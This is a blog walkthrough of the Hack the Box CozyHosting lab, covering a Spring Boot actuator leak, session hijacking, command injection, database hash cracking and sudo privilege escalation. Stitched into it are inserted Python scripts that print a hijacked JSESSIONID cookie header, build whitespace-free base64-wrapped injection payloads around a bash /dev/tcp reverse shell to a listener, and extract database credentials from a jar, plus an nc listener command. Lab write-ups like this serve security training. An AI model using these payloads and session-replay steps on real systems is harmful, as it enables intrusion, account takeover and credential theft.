036#:HTB - CozyHosting

     Next up is CozyHosting on Hack the Box. I have been tearing through these rooms the past week so let’s keep it going. I realized halfway through this room that it was also on TJ Null’s OSCP prep list so I get to cross another one of those off my list.

     Not much going on, so let's run gobuster and start poking around. Gobuster fails to scan and the site fails to load from just the IP though. Looking at the nmap results again we can see mention of cozyhosting.htb, which we should add to our /etc/hosts file.

CozyHosting - Gobuster 1

     Much better. We see an info@cozyhosting.htb address mentioned, which I take note of. In the source code of the login page we discover that it is made using Bootstrap v5.2.3. Searchsploit doesn't have much here though. I tried some default credentials for Bootstrap that didn't work. I guess I will try to brute force the login page with the one username we have.

     To do this, we need some more info. First I faked a login so I could get the error message it produces. Then I opened Burp Suite and intercepted a login attempt so I could see what username/password parameters are being passed to the site.

CozyHosting - Hydra 1

     Hmm, this is taking too long to be the correct path. I tried another go using the whole email address for the info user, but that gets us nothing either. I started inspecting request headers in my browser. I am feeling a bit stuck and began revisiting my findings so far. On the /error page we found, an unexpected error was thrown, so I googled it.

CozyHosting - Google 1

     I see multiple mentions of something called Spring Boot. I began researching what this is and it looks to be a framework for making Java apps. Their quickstart guide shows that these apps can be accessed at paths like /hello.

CozyHosting - Site 3

     This does make me think I need to run gobuster again though. I got another scan going with a larger wordlist this time.

CozyHosting - Gobuster 2

     We got some new hits, but they don't actually work when I navigate to them. I slept on it, and returning the next day I am still just as lost. Time for some Guided Mode questions.

     Well, we were on the right track, but it didn't occur to me to look for wordlists specifically for the app I'm fuzzing. I updated my personal notes so I hopefully don't forget to try this in the future.

     I was having a bit of trouble finding an appropriate wordlist though. After skimming some articles, I found this one, which mentions a small wordlist they gathered. They also explained how they gathered it, which is nice.

     I just copied and pasted their wordlist before running gobuster again.

CozyHosting - Gobuster 3
CozyHosting - Site 5

     Going to that directory reveals some more paths to explore. I began looking at each of these additional pages. We find a kanderson user, which is good. There is also some interesting info in /env.

     I didn’t find anything particularly damning though, so I checked out the first article in the series I linked a moment ago. This one covers exploiting these Spring Boot actuators we found.

     It’s another day and I ran into an odd issue that I wanted to note for this room. I tried to pick up where I left off, but the cozyhosting.htb site won’t load. I scanned it with nmap again and port 80 wasn’t even open! 

     Not sure what happened there, but the only thing that worked was for me to change VPNs in Hack the Box and load the machine again. Very strange. 

     Moving on, I ran some hydra attempts with the new username I found while I kept messing with the actuator.

CozyHosting - Hydra 2
CozyHosting - Hydra 3

     At this point, I am slowly skimming through /actuator/mappings for anything of value. Close to the bottom we run across mention of a /executessh. I tried navigating to cozyhosting.htb/executessh in my browser and got a different error this time.

     This isn't a 404 Not Found error, so I might be able to work with this. I tried pulling it up in Burp Suite but I didn't learn anything else. Researching the 405 error suggests the endpoint expects a different HTTP method than the one I sent, probably a POST rather than a GET. After skimming the /mappings page again, I realized I was indeed using GET instead of POST.

CozyHosting - Burpsuite 1

     Okay, still got an error but a different error. This implies something about my request was incorrect. I looked over the section for it in /mappings but I’m still unsure.

CozyHosting - Site 8

     I asked claude.ai if it could help me understand how I am supposed to interact with /executessh. It looks like it is expecting two strings. This began a period of trial and error in Burp Suite. The tricky part is that we don't know what exact parameters are expected, but we can take a guess based on the context of it being /executessh (maybe it lets you execute commands over SSH?).

     This isn’t giving us output though and I’m hitting a wall. Let’s do another Guided Mode question.

CozyHosting - Hint 2

     Okay, so we are on the right track at least. We need to do blind fuzzing, I guess, to see if I am getting these parameters right. To do this, we will want to use sleep so that there is a noticeable pause before the page loads. This will clue us in on whether we passed the right parameter through.

     I tried so many different combinations of parameter names and values, it was a pain. I tried combinations like host/cmd, host/command, host/exec, host/run, cmd/host, command/host, exec/host, server/cmd, cmd/server, etc…

CozyHosting - Burpsuite 33

     I am hitting a wall pretty hard. To make things worse, every time I set it down for the night I get that error with the room where it doesn’t load correctly. I have had to change my VPN profiles about 4 times already for this one room. 

     Time for some more help. I peeked at cloverphile's walkthrough just long enough to spot what I did wrong, and it was easy to spot. I had missed the session ID for the kanderson user I found; it just hadn't clicked for me when I saw it.

CozyHosting - Site 9

     Kicking myself for missing that. If we update the JSESSIONID value in our cookies for cozyhosting.htb and reload the page, we are now greeted with the /admin panel.

CozyHosting - Browser 1
CozyHosting - Site 10

     Let’s poke around. You may have to replace your cookie’s session ID if it stops working for you. I just had to get the latest one for kanderson out of the /actuator/sessions page. It does look like we found our mystery parameters for /executessh though! I tried localhost and test which gave me an error.

CozyHosting - Site 12
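The two actuator pages that carried this room, /actuator/mappings and /actuator/sessions, are JSON documents that are tedious to read by eye. The script below is an added example (not code from the original post or from the box) that parses both: it lists every dispatcher-servlet route with its HTTP method, which is how the POST-only /executessh route would be spotted, and pulls the session IDs that belong to a given principal so the JSESSIONID cookie can be swapped in one step. Both JSON documents are constructed samples shaped like the real actuator output; the session IDs and the controller names in them are made up.

```python
"""Parse Spring Boot actuator /mappings and /sessions output (added example)."""
import json
import re

# Constructed sample of /actuator/mappings. Spring Boot nests routes as
# contexts -> <context> -> mappings -> dispatcherServlets -> <servlet> -> [entries].
# Handler class names here are made up; the two paths are the ones the page names.
MAPPINGS_JSON = json.dumps({
    "contexts": {"application": {"mappings": {"dispatcherServlets": {"dispatcherServlet": [
        {
            "handler": "example.ComplianceController#executeOverSsh(String, String)",
            "predicate": "{POST [/executessh]}",
            "details": {"requestMappingConditions": {"methods": ["POST"], "patterns": ["/executessh"]}},
        },
        {
            # Entry without "details": only the predicate string is available.
            "handler": "example.AdminController#index()",
            "predicate": "{GET [/admin]}",
        },
        {
            # Static-resource handler; its predicate has no method/path block and is skipped.
            "handler": "ResourceHttpRequestHandler [\"classpath:/static/\"]",
            "predicate": "/**",
        },
    ]}}}}
})

# Constructed sample of /actuator/sessions in the map form the page describes
# (session ID -> principal). The list form returned by Spring Session's endpoint
# ({"sessions": [{"id": ..., "principalName": ...}]}) is handled as well.
SESSIONS_JSON = json.dumps({
    "sessions": {
        "7F6C5F8B3B1A4C2D9E0F1A2B3C4D5E6F": "UNAUTHORIZED",
        "A1B2C3D4E5F60718293A4B5C6D7E8F90": "kanderson",
    }
})

# Matches predicate strings such as "{POST [/executessh]}" or "{ [/error]}".
PREDICATE_RE = re.compile(r"\{\s*(?P<methods>[A-Z, ]*)\s*\[(?P<paths>[^\]]*)\]")


def handlers(mappings_json: str):
    """Return sorted (method, path, handler) triples for every dispatcher-servlet route.

    Prefers details.requestMappingConditions and falls back to the predicate string.
    Routes that declare no method are reported as "ANY".
    """
    doc = json.loads(mappings_json)
    routes = set()
    for ctx in doc.get("contexts", {}).values():
        servlets = ctx.get("mappings", {}).get("dispatcherServlets", {})
        for entries in servlets.values():
            for entry in entries:
                cond = entry.get("details", {}).get("requestMappingConditions")
                if cond:
                    methods = cond.get("methods") or ["ANY"]
                    paths = cond.get("patterns") or []
                else:
                    match = PREDICATE_RE.search(entry.get("predicate", ""))
                    if not match:
                        continue
                    methods = [m.strip() for m in match.group("methods").split(",") if m.strip()] or ["ANY"]
                    paths = [p.strip() for p in match.group("paths").split(",") if p.strip()]
                for method in methods:
                    for path in paths:
                        routes.add((method, path, entry.get("handler", "")))
    return sorted(routes)


def sessions_for(sessions_json: str, principal: str):
    """Return the session IDs belonging to `principal`, whichever shape the endpoint uses."""
    sessions = json.loads(sessions_json).get("sessions", {})
    if isinstance(sessions, dict):
        return sorted(sid for sid, who in sessions.items() if who == principal)
    return sorted(s["id"] for s in sessions if s.get("principalName") == principal)


def cookie_header(session_id: str) -> str:
    """Header to replay a hijacked session; the same value goes into the browser's JSESSIONID cookie."""
    return f"Cookie: JSESSIONID={session_id}"


if __name__ == "__main__":
    for method, path, handler in handlers(MAPPINGS_JSON):
        print(f"{method:5} {path:15} {handler}")
    for sid in sessions_for(SESSIONS_JSON, "kanderson"):
        print(cookie_header(sid))
```

Sessions expire, which is why the cookie had to be refreshed from /actuator/sessions more than once; re-running the script against a fresh download of that page gives the current ID for kanderson.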

     I switched over to Burp Suite so I don't have to type these in every time while I play with the syntax.

CozyHosting - Burpsuite 3

     The command failed but we can see it at least tried to run it. I’m a bit rusty with command injection, so I start going through different methods from my notes. I tried chaining commands with && and |. When I tried command substitution, it looks like whoami actually worked.

CozyHosting - Burpsuite 4

     It looks like the user is named ‘app’. I tried seeing if I could get a reverse shell but I got an error about the username not being able to contain whitespaces. Encoding the payload may help us here. I first attempted URL encoding but it still detected the whitespaces. I googled a way to obfuscate whitespaces and got two results which both seem to work.

CozyHosting - Burpsuite 6

     I tried a reverse shell again but got another error. I decided to start looking around instead. I found a user named josh in the home folder. The /app folder contains a file named cloudhosting-0.0.1.jar that seems interesting, I’m not sure how to read it though. 

     I confirmed the webroot appeared to be in /var/www/html/ but I didn’t have permission to write there. It looked like python3 is installed on the victim, so I spun up a python server in the /app directory and used wget to pull the jar file to my machine.

CozyHosting - BurpSuite 7
CozyHosting - Wget 1

     Now that I have the file, I started by just running strings against it. That is a ton of info though so we are going to need to find a way to locate just the good stuff. 

     I tried grepping pwd, config, admin, database and some others but I’m not finding anything of worth. I searched google for “sensitive spring boot files” and saw that application.yml and application.properties are good targets.

CozyHosting - Grep 1

     I am struggling to find the actual file on the server though. This method of command execution is horribly inefficient for this too. I decided to try again to get a reverse shell. 

     I encoded the command with base64, but we are going to need to decode it as well. I played around a bit and found a syntax that works that finally got a shell.

CozyHosting - Burpsuite 8
CozyHosting - Shell 1
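The two hurdles above, a username field that rejects whitespace and a reverse shell that would not survive being dropped into the ssh command, are both payload-construction problems. The script below is an added example, not code from the original post: it mocks the whitespace check the error message implies (an assumption about the app's logic), spells a space without using one in the two standard ways (${IFS} expansion and bash brace expansion), and wraps an arbitrary command in base64 inside the $(...) substitution that the page found was evaluated. The listener address is a made-up placeholder, and the form field name `host` is assumed; `username` is taken from the error message the page quotes.

```python
"""Build whitespace-free command-injection payloads for /executessh (added example)."""
import base64
import re
import shutil
import subprocess
from urllib.parse import urlencode

# Placeholder listener for the reverse shell; not the author's real address.
LISTENER_IP = "10.10.14.5"
LISTENER_PORT = 4444
REVERSE_SHELL = f"bash -i >& /dev/tcp/{LISTENER_IP}/{LISTENER_PORT} 0>&1"

WHITESPACE = re.compile(r"\s")


def username_accepted(username: str) -> bool:
    """Mock of the server-side check behind 'username can't contain whitespaces' (assumed logic)."""
    return not WHITESPACE.search(username)


def nospace_ifs(command: str) -> str:
    """Replace each space with ${IFS}. The shell expands it to its field separator
    and word-splits, so 'echo${IFS}hi' runs as 'echo hi'. Works in sh and bash."""
    return command.replace(" ", "${IFS}")


def nospace_braces(pipeline: str) -> str:
    """Rewrite each multi-word stage of a pipeline as {a,b,c}; bash brace expansion
    turns it back into 'a b c'. Bash-only, and tokens must not contain commas."""
    stages = []
    for stage in pipeline.split("|"):
        words = stage.split()
        stages.append("{" + ",".join(words) + "}" if len(words) > 1 else stage.strip())
    return "|".join(stages)


def b64_wrapper(command: str, spacer=nospace_ifs) -> str:
    """Wrap any command so the injected text has no whitespace and no characters that
    ssh argument parsing cares about: base64 it, then decode and pipe to bash on the
    target. The outer $(...) is the substitution that made 'whoami' run."""
    encoded = base64.b64encode(command.encode()).decode()
    return "$(" + spacer(f"echo {encoded}|base64 -d|bash") + ")"


def decode_wrapper(payload: str) -> str:
    """Recover the original command from a b64_wrapper payload (for local verification)."""
    match = re.search(r"echo(?:\$\{IFS\}|,)([A-Za-z0-9+/=]+)", payload)
    return base64.b64decode(match.group(1)).decode()


def post_body(payload: str, host: str = "localhost") -> str:
    """Form body for the POST to /executessh; URL-encoding is undone server-side before the
    whitespace check runs, which is why percent-encoded spaces were still rejected."""
    return urlencode({"host": host, "username": payload})


def local_smoke_test() -> str:
    """Run a harmless payload through a local bash the way the target's shell would.
    Returns the substituted text, or 'skipped' when bash or base64 is unavailable."""
    if not (shutil.which("bash") and shutil.which("base64")):
        return "skipped"
    payload = b64_wrapper("echo hello")
    result = subprocess.run(["bash", "-c", f"printf '%s' {payload}"],
                            capture_output=True, text=True)
    return result.stdout.strip()


if __name__ == "__main__":
    payload = b64_wrapper(REVERSE_SHELL)
    print(payload)
    print(post_body(payload))
    print("local check:", local_smoke_test())
```

Start the listener (for example `nc -lvnp 4444`) before sending the body, and keep in mind that the inner command runs with the web application's privileges, which is why the resulting shell belonged to `app`.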

     Thank goodness. This has been a tough one for me. I stabilized my shell before using “find” to try to locate application.properties to no avail. I am having trouble getting this file so I just poked around more. In the /var/debconf folder I found some config files to look through. Still nothing though, so time to run linPEAS.

CozyHosting - LinPEAS 1

     I was going through the results but I kept thinking about that application.properties file we saw mention of. I haven't worked with JAR files much. I did a quick search and learned they are basically just zip files. I unzipped the jar and was able to finally read that config file.

CozyHosting - Config 1

     I tried switching users to postgres but it failed authentication. I then tried it as the app user’s password which also failed. We did see a josh user in the home folder, so I tried this password there too. This also fails though.

CozyHosting - Shell 2

     I am probably not trying to log into the right thing here. I googled what to do with a postgres password and learned that I need to try to access the PostgreSQL database using it. I see that I can get into the database using a syntax like "psql -U <username> -d <database_name> -h <hostname> -p <port>".

     Checking the file we found the password in, we get the missing info of port and database name. It said it couldn’t find the database name but after playing with the command I was able to log in by not specifying the database.

CozyHosting - Postgres 1
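The search for application.properties on disk was never going to succeed because Spring Boot packages the application's own resources inside the jar under BOOT-INF/classes/. The script below is an added example, not code from the original post: it builds a tiny stand-in jar in memory (so it runs offline; the host, database name, user and password in it are constructed placeholders, not the box's real values), lists the config files inside it, reads application.properties without unpacking anything else, and turns the spring.datasource.* entries into the psql command line and PGPASSWORD environment the login step needs.

```python
"""Read Spring Boot config out of a jar and derive the psql connection (added example)."""
import io
import zipfile
from urllib.parse import urlparse

PROPERTIES_PATH = "BOOT-INF/classes/application.properties"
CONFIG_SUFFIXES = (".properties", ".yml", ".yaml")

# Constructed properties file with placeholder credentials.
SAMPLE_PROPERTIES = """\
server.address=127.0.0.1
server.port=8080
# JDBC URL carries host, port and database name.
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=ExamplePassword123
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
"""


def build_sample_jar() -> bytes:
    """Create a minimal Spring Boot-style jar in memory (a jar is just a zip archive)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\nMain-Class: org.springframework.boot.loader.JarLauncher\n")
        zf.writestr("BOOT-INF/classes/example/Placeholder.class", b"\xca\xfe\xba\xbe")  # dummy class
        zf.writestr(PROPERTIES_PATH, SAMPLE_PROPERTIES)
    return buf.getvalue()


def config_members(jar_bytes: bytes):
    """List application config files bundled under BOOT-INF/classes/."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return sorted(name for name in zf.namelist()
                      if name.startswith("BOOT-INF/classes/") and name.endswith(CONFIG_SUFFIXES))


def read_properties(jar_bytes: bytes, member: str = PROPERTIES_PATH) -> dict:
    """Parse key=value lines from a single jar member; comments and blanks are skipped."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        text = zf.read(member).decode("utf-8")
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")) or "=" not in line:
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props


def psql_command(props: dict) -> str:
    """Build the psql invocation from spring.datasource.*. Host, port and database come
    from the JDBC URL; psql's own default for -d is the username, which is why omitting
    it still logged in (the postgres role has a database of the same name)."""
    url = props["spring.datasource.url"]
    if not url.startswith("jdbc:postgresql://"):
        raise ValueError(f"not a PostgreSQL JDBC URL: {url}")
    parsed = urlparse(url[len("jdbc:"):])
    user = props["spring.datasource.username"]
    host = parsed.hostname or "localhost"
    port = parsed.port or 5432
    database = parsed.path.lstrip("/") or user
    return f"psql -h {host} -p {port} -U {user} -d {database}"


def connection_env(props: dict) -> dict:
    """Environment for a non-interactive login; PGPASSWORD keeps the secret out of the command line."""
    return {"PGPASSWORD": props["spring.datasource.password"]}


if __name__ == "__main__":
    jar = build_sample_jar()
    print("config files:", config_members(jar))
    props = read_properties(jar)
    print(psql_command(props), connection_env(props))
```

On the box itself `unzip -p cloudhosting-0.0.1.jar BOOT-INF/classes/application.properties` prints the same file without unpacking the archive. Once inside psql, `\l` lists databases, `\c cozyhosting` switches to one, `\dt` lists its tables, and `SELECT * FROM users;` dumps the hashes that were fed to hashcat.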

     I haven’t directly logged into a postgresql database before, so I need to figure out how to navigate here. I googled basic syntax to get around and began slowly working my way through until I discovered the cozyhosting database with the users table inside.

CozyHosting - Postgres 3
CozyHosting - Postgres 2

     I copied these hashes to a file and cracked one with hashcat.

CozyHosting - Hashcat 1
CozyHosting - Hashcat 2

     Awesome, we have a password. There is no admin user to log in as, so I tried this password with josh’s account and got in. This also gets us our first flag.

CozyHosting - Shell 3
CozyHosting - Flag 1

     Checking our sudo rights, we see something interesting that is probably our priv esc path.

CozyHosting - Sudo 1

     Sweet, let's see what GTFOBins recommends. They have a simple command that gets us root and our final flag.

CozyHosting - Flag 2

     Man, this room was tough for me. The priv esc was easy but I struggled at numerous points with this one. I think this was made worse by the technical difficulties the room was having. It burned a lot of time and wore me down a bit. 

     The main takeaways I got from this room were that I need to remember to keep an eye out for session cookies, practice command injection more, and that I got some experience working with postgresql databases. While this room was a bit of a slog at times, I’m glad to have the experience under my belt.

[CATZ....HACKS]